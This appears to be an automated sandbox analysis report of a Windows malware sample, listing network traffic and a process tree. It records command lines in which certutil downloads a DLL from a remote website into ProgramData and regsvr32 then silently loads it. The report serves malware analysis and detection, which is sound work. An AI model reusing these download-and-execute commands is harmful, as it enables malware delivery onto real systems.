Content-Type: text/html; charset=iso-8859-1
2021-09-15 11:47:29 UTC | 0 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49773 | 100.26.95.170 | 443 | C:\Windows\SysWOW64\certutil.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:47:31 UTC | 0 | OUT | GET /volunteer/actXApiLib.dll HTTP/1.1
Accept: */*
User-Agent: CertUtil URL Agent
Host: www.christchurchmvl.org
Cache-Control: no-cache
2021-09-15 11:47:31 UTC | 0 | IN | HTTP/1.1 404 Not Found
Date: Wed, 15 Sep 2021 11:47:31 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
2021-09-15 11:47:31 UTC | 0 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time:13:46:42
Start date:15/09/2021
Path:C:\Users\user\Desktop\cBQPecnQRp.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\cBQPecnQRp.exe'
Imagebase:0x400000
File size:1363448 bytes
MD5 hash:53817315B195E328CCC0F56B15B247C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:13:47:24
Start date:15/09/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\cmd.exe
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:47:25
Start date:15/09/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff724c50000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:13:47:26
Start date:15/09/2021
Path:C:\Windows\SysWOW64\certutil.exe
Wow64 process (32bit):true
Commandline:certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Imagebase:0x10a0000
File size:1273856 bytes
MD5 hash:D056DF596F6E02A36841E69872AEF7BD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:13:47:32
Start date:15/09/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Imagebase:0x1370000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis
